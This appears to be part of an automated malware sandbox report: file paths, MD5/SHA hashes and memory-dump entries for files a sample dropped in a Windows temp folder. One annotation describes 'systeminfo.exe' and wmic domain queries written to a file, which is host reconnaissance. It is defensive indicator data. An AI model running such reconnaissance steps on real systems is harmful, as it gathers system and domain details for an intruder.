\??\c:\Users\Admin\AppData\Local\Temp\uxx4ugcp\CSC388BE5BBA5B64FC4AA63A22663A459CB.TMP

MD5 13c40549927ecb565a68080079adeedf
SHA1 97337504d2c448e0802c67fa34e4472f03a9011f
SHA256 7e20b13cb6ba9ed1312daf7a2548741712dcf54fe72ccbaa751ab1d1991761bf
SHA512 972e4cbb137a1969dc3fc4cf22c65c43cbfc6f1cfccc5875953d35a02bfa321c7a345a8f639e2727350db6c96428238619ad089ca0f28137dc9eefa9cff16b3d

C:\Users\Admin\AppData\Local\Temp\RES5043.tmp

MD5 4a122eee466af995b7a1d8924beffb42
SHA1 b10f5efaa7f55d317a8614fdee1c57fde080805c
SHA256 b9f61a5ff377549992dac2f1b55ff75626b8661ac0e16b9324ab020baffef3b7
SHA512 df0542d6cefa9ad1a23aef27c6738249fc0390dd8ae8ccca71d62b660ba4693130535774647606f32cef1c131c7b95a41f056addff6cac6a1e9f553f60ae4aa9

C:\Users\Admin\AppData\Local\Temp\uxx4ugcp\uxx4ugcp.dll

MD5 75aa4748f3e6e6d709b8b1bbce3e58d6
SHA1 b1a9cb016fd7dcbabb8426cd58fa383b3498c254
SHA256 a5fd7722a679294932263c268a88db7008c6df49dd6a4f1677c358be6f268deb
SHA512 23300e7f347a6c94b7a6f5103e0d46b1498e4a478b9be3537108e5b88dea48471fc5193584d3b28f2dcc025cbda6d0627ffd5bf60135d232ab4b545c2aa9da99

memory/3756-150-0x0000000000000000-mapping.dmp

\??\c:\Users\Admin\AppData\Local\Temp\iolzmld3\iolzmld3.cmdline

MD5 2398ccec5a25485d6042481ef7559a3a
SHA1 71e68ee684d643f355e65433ad2acf2f6f242863
SHA256 3af15a6c0999fe9ba0bc6ddd67dee3bc0c1003a0b71c3eb94c6c2d1ac8db90fd
SHA512 ab5e61cdfef3e622e35fa6bb4ef07bcb437471f692749649a817cbd9f4b3aa89402f629c86b160544febef3f8226b46ede35d571d152c0ef390cef504b0a30ba

\??\c:\Users\Admin\AppData\Local\Temp\iolzmld3\iolzmld3.0.cs

MD5 aca9704199c51fde14b8bf8165bc2a4c
SHA1 789b408ccad29240bd093515cbd19a199ad2c1c8
SHA256 cb3da8a9768252634f8ed4c62e026dc8217b055e00f11b6012a52ed130c92c27
SHA512 a8c1df598581f508ecbf1e516744f11abfb71ec6bb9895d0b61f15e70e56e27cb40b4e5395b9411b787f8bb4f264ca704d815260677909dc1e599d601d0b5de6

memory/2496-153-0x0000000000000000-mapping.dmp

\??\c:\Users\Admin\AppData\Local\Temp\iolzmld3\CSCACAD3E6DBCBF48B79E53F981574095C0.TMP

MD5 f8fbea95306639b9adfe5d4913a163fc
SHA1 25cdc0c5839ca541de0f2024635d88d201143424
SHA256 6817c040bcad74ce38c95cf8804e7fcb0083575c6db2825783e1c04fa9b1e91c
SHA512 51a31f52d1a368a40dfd06d528a3f55215439b2eec9dc2bf28d6ec0aee51cd3d02f6b8af82a83a0713aabf3e2a687517354fd4f5eda90d0ba9b1c8d0725f05fc

C:\Users\Admin\AppData\Local\Temp\RES513D.tmp

MD5 ca6364963d0e10b3f9430f798562d089
SHA1 8096e5a8e3c65cf7c178204ea92f3d66ac16babd
SHA256 0e2177f33b076c4d61909766d71cf6ffa6080c42a25cd5198c86be36976936fe
SHA512 156ef898d22de0c4a90cfc4d48332e7328e53603d52d669c731b7f904acf6f0bbdb19a97a37b1c99c7ad015c27420fc26075cca6e1598e976d07dd7370ca8f4c

C:\Users\Admin\AppData\Local\Temp\iolzmld3\iolzmld3.dll

MD5 7380ea8a6308480b56661d8171a72f38
SHA1 2acc510489147a6cbd8b7b99c983ed016d4319d2
SHA256 a35454500dbfacdb763ae98d06cc202efcfb6b14551c430054ad40949d9a8a99
SHA512 1e35e97de56938fb78035de57aa6b5e6ae1da30f2e3871f59286c48f1d349c072c0e9ff162823f81064f2b6d78a3e0ea5a1fd4832e3c239e416e18086fc5eb76

memory/3176-157-0x00000184EB9A0000-0x00000184EB9DD000-memory.dmp

memory/3176-158-0x00007FFDD1FD0000-0x00007FFDD2A91000-memory.dmp

memory/3176-159-0x00000184EB9A0000-0x00000184EB9DD000-memory.dmp

memory/3412-160-0x0000012777C80000-0x0000012777D23000-memory.dmp

memory/4872-163-0x0000000000000000-mapping.dmp

memory/3720-162-0x000001842F290000-0x000001842F333000-memory.dmp

memory/2308-164-0x00000000092E0000-0x0000000009383000-memory.dmp

memory/4856-161-0x0000000000000000-mapping.dmp

memory/1676-165-0x00000216AE550000-0x00000216AE5F3000-memory.dmp

memory/4600-167-0x0000000000000000-mapping.dmp

memory/3972-166-0x00000290C22E0000-0x00000290C2383000-memory.dmp

memory/2928-168-0x0000000000000000-mapping.dmp

memory/4872-169-0x0000000000126B20-0x0000000000126B24-memory.dmp

memory/4872-170-0x0000000001600000-0x0000000001696000-memory.dmp

memory/2016-171-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\5402.bin1

MD5 f7aea2435aa888b709ca20f816c33bfd
SHA1 38717c9a73b5f8bd399839cbe0aa57518427e758
SHA256 f0c30a157e0a0ea84b114c2b66a66d444a3824c2bfe7829d929b40e6548fa5d5
SHA512 1ea828fc1932c97f5ba5f6ebf05f2816d4d89f003b094f2d0868d54f52b53774437037e2c8837e97b820d5f2e5d5707825b048a9ab2af261af00810f01bd8232

memory/3696-173-0x0000000000000000-mapping.dmp

memory/2308-174-0x000000000B670000-0x000000000B7AB000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\5402.bin1 (zero-byte snapshot: these are the hashes of empty input, taken when "systeminfo.exe >" truncated the file, discarding the wmic domain output written earlier, before systeminfo.exe produced anything)

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/3948-179-0x0000000000000000-mapping.dmp

memory/2308-180-0x0000000008DD0000-0x0000000008F0A000-memory.dmp

memory/1752-184-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\5402.bin1

MD5 45e2f8c6c0f4ca2bf474ff5611613c3c
SHA1 03766264e59200ea00076eb884a0e060597534f6
SHA256 ddb2002b82a3d4caa1e52cd0c3c66d87605a758498638d75e5fc4475c154d8c5
SHA512 23b178e0b9fd15fdd550838e4271c66c730148af47cecb624311dbfa90c4e985bfacfa305f6459f3f1194ea2f998c71880e3bbcb781770a40138c7222295f04f

memory/4668-186-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\5402.bin1

MD5 45e2f8c6c0f4ca2bf474ff5611613c3c
SHA1 03766264e59200ea00076eb884a0e060597534f6
SHA256 ddb2002b82a3d4caa1e52cd0c3c66d87605a758498638d75e5fc4475c154d8c5
SHA512 23b178e0b9fd15fdd550838e4271c66c730148af47cecb624311dbfa90c4e985bfacfa305f6459f3f1194ea2f998c71880e3bbcb781770a40138c7222295f04f

memory/3428-188-0x0000000000000000-mapping.dmp

memory/2308-189-0x00000000092E0000-0x0000000009383000-memory.dmp

memory/1300-190-0x0000000000000000-mapping.dmp

memory/1980-191-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\5402.bin1

MD5 28c5857b9d6bf0183723449cd9440a02
SHA1 77fed5079cf0ccc7b731718c47393b8120d26668
SHA256 2511cc082c53cf52b652903951746353b6ab39ab35ea05a63a3413af22bfe15a
SHA512 902f1ce5fddfeddf083c483f1031f81cb734685e61abecb223290ad278b828d76ea8fca1ef4d4fec19cfa5a4934e0933a283e6c1a1f7f036843d75aec604634c

memory/4288-193-0x0000000000000000-mapping.dmp

memory/4648-194-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\5402.bin1

MD5 91e8d8629059d044757c002fdb30f7f6
SHA1 5d427d6bd6d8d1d3c487f1657838a986f9202919
SHA256 f2992e2a303c30193752f7b4bc9375bbd551c4a6b7ba2c084757b4f377a80611
SHA512 ac5fd198fadccf0c3bc94e3bb572d6aee3fa2451880ca5058891fb909292fc3d152e76e8c7fe43dad6aa9b03ca48b70b7e8e4c1ce6ba3e2bdeb09cc6e65dede3

memory/4220-196-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\5402.bin1

MD5 ed3204561a6ea836f028293bb7f87d0e
SHA1 454c6de92d2598d3136f0e795605af4208ef73b1
SHA256 5e4a5f745f981b32aaa0098512830eeb8ce469c240ef67b72920744e2bc3125e
SHA512 7b2ac1146b184a453913fb2613a7d58cf58572032530d730edc29a463e5109f1976d1d6818ec62cc3590401ec852351f3eef2c01394396e5d4d942492b6471b1

memory/4276-198-0x0000000000000000-mapping.dmp

memory/2416-199-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\5402.bin1

MD5 c7717d124e952b31f3633e08b2abc64f
SHA1 16381f605672bc938bca863c1c61def0e5ebd072
SHA256 b1844a2796b2839fb139f67671dc001927e7796dcfa8718efd670ef213e34e2d
SHA512 236f330551bf4079c677bef136190079d8047c90b8b1bcb7b36f75412288ef0af249cd7eec3c781f08616833a12ac295b76758ba6660fce080cca15acceb23c4

memory/924-201-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\5402.bin1

MD5 19527b811ed093250808107d2e2de1ed
SHA1 58837f3e17828de5e571ac0d41c4de838c84e4ce
SHA256 d611bded828bea92f39edba187f02924082c50b5836b3bbd2ed3cc57d8afe054
SHA512 fa604ebf5bee1ed9e45faf0899cfb135608338df4dd7595483bc4a183719252b47962db5ec04d2450a8d556b0b2a1bcd9c514ce4eba1c7e5b80154e7c5894428

memory/4616-203-0x0000000000000000-mapping.dmp

memory/5080-204-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\5402.bin1

MD5 3f59a671f7f4a34d7dcdc45ce94b4ab9
SHA1 e1e0cf155d645fa9b092e1f6b53a2435f7207130
SHA256 f8d44bbba2c5499ce8b111dfa28336a618cda25d4f37443ff777bb2c3881bee6
SHA512 a42a33385a796c2a131f3a9a1363897154ff7a8d71a22ce7437ae358b75a5149b1e68a369c87f509cc4f95848adfe8405f5cf6f6fff63d4054c0b7e451829884

memory/3600-206-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\5402.bin1

MD5 3f59a671f7f4a34d7dcdc45ce94b4ab9
SHA1 e1e0cf155d645fa9b092e1f6b53a2435f7207130
SHA256 f8d44bbba2c5499ce8b111dfa28336a618cda25d4f37443ff777bb2c3881bee6
SHA512 a42a33385a796c2a131f3a9a1363897154ff7a8d71a22ce7437ae358b75a5149b1e68a369c87f509cc4f95848adfe8405f5cf6f6fff63d4054c0b7e451829884

memory/4344-208-0x0000000000000000-mapping.dmp

memory/2768-209-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\5402.bin1

MD5 abf64e6496c59529fb810077fd3119ef
SHA1 98ff44e960386613f7d58562cb5f3290e98e9df1
SHA256 794f6c19695cf6d98006039a7a380573a669ee73e270efa0a640d6ca7741c649
SHA512 d8c1c9a0fc4aee82316a07c92dbb207150b253b56df4c9ee5a4d664fcd0b720a2a242c6d16c3eb114425058d1742bcc40c0df821e571df39e761c33c6ada7ee7

memory/3012-211-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\5402.bin1

MD5 abf64e6496c59529fb810077fd3119ef
SHA1 98ff44e960386613f7d58562cb5f3290e98e9df1
SHA256 794f6c19695cf6d98006039a7a380573a669ee73e270efa0a640d6ca7741c649
SHA512 d8c1c9a0fc4aee82316a07c92dbb207150b253b56df4c9ee5a4d664fcd0b720a2a242c6d16c3eb114425058d1742bcc40c0df821e571df39e761c33c6ada7ee7

memory/3056-213-0x0000000000000000-mapping.dmp

memory/2292-214-0x0000000000000000-mapping.dmp

memory/3404-215-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\5402.bin1

MD5 071b54b10c201d9a75dc124bd6b60195
SHA1 e6490ad03960eff659c650bca6fe09c278bef4c7
SHA256 e79290c2f7b9c34296a602c45cc68bb680d0a0ae404b3b90ad1f5fe013dc6091
SHA512 bfd3d967b7ea1a17cf7b79f0192232d9511006d58c6113559884e69d438bb68777ff8105307c997d3055ce815e44857b1c3cf74516f016c917d246e174cb2344

memory/4720-217-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\5402.bin1

MD5 071b54b10c201d9a75dc124bd6b60195
SHA1 e6490ad03960eff659c650bca6fe09c278bef4c7
SHA256 e79290c2f7b9c34296a602c45cc68bb680d0a0ae404b3b90ad1f5fe013dc6091
SHA512 bfd3d967b7ea1a17cf7b79f0192232d9511006d58c6113559884e69d438bb68777ff8105307c997d3055ce815e44857b1c3cf74516f016c917d246e174cb2344

memory/1164-219-0x0000000000000000-mapping.dmp

memory/1824-220-0x0000000000000000-mapping.dmp

memory/3128-221-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\5402.bin1

MD5 d9b94eb5a102fdae456204a449e973a7
SHA1 530974261c01770ad7a39d8ac8151792132ac990
SHA256 150a020be080476b8dc73ba9c278041ef0c0371266f47ac2815943cc37917366
SHA512 e8c548830d9b65a375b7774fda580bb06ae5d2ee4c52b2e87325be78f3de0841a7eda3e0041f2ee0c2af5c029baa2d9b749d35e1b6cba47b0f7db9c85212e77e

memory/4204-223-0x0000000000000000-mapping.dmp

memory/2548-224-0x0000000000000000-mapping.dmp

memory/908-225-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\5402.bin1

MD5 cab5b6729b5bb3e8f490f7cb0189e970
SHA1 0dd4bcc3ce80531496ff5ea7fcaa6b721bc56a5a
SHA256 e85d44207c226c0ec93c5850f193106b807f0606b963f0eb5758865629c7e930
SHA512 8b89cc4a673714131b100bfcb86744d5a8ee7d77b87dee2ddc749e3ff75a71bf0cec4174aec390eacef654b717fffd700d9f588ec0f16c98736fd1cc5a68220e

memory/4224-227-0x0000000000000000-mapping.dmp

memory/432-228-0x0000000000000000-mapping.dmp

memory/4912-229-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\5402.bin1

MD5 3ae9d680b324f08cfe4a590ea56725ac
SHA1 4a02075d3c583159dcae5ac69849bf274cbf90a1
SHA256 c6e2595e5f76cbda8e6ebb1c6465779798c792ff906b7c6e6858b8fd3d211724
SHA512 fc65d1d5ec4e0c5d880f8706db407ae4c0dcd4b8c3a6df0310d1dc90722c767fbabfb175d94a8d2a8814b568a7612090701d5a3a091bc5ce6a97cfc5706a39df

memory/3856-231-0x0000000000000000-mapping.dmp

memory/4440-232-0x0000000000000000-mapping.dmp

memory/3996-233-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\5402.bin1

MD5 5ba94a59c8895f622608e8a6484ba516
SHA1 aa6b20c18d068c0e2613eff286a5ce5d35a68915
SHA256 876085d57159e7f54ed2ea6d01167f94daeb5e90aa07fac151e61b9a0b4ef369
SHA512 2a2150b289dc4f6635c13ba9d42842f46292622f673075da6a6aa522223ae55be855dfd1daa354da5202d268e1b5d88c5698c1d4a0b69ad4b9e90db6907be40a

C:\Users\Admin\AppData\Local\Temp\5402.bin

MD5 bb647e73a1544304d7b25bf7fd1cdd01
SHA1 6f731fb75acdd35e52de886577ee99fc66db2aff
SHA256 67498903bfbfa2680b4630741e6ed999639cc2eb253c8b250a07c567b97ec21b
SHA512 00b5abbd1691c9ddfe60902d7df495ba585a85a8272e4f4eaa0e92d1ebf6007afead623cccd238acf1823fd47ab43ec1d7321d389c58e06d08081985f18e4532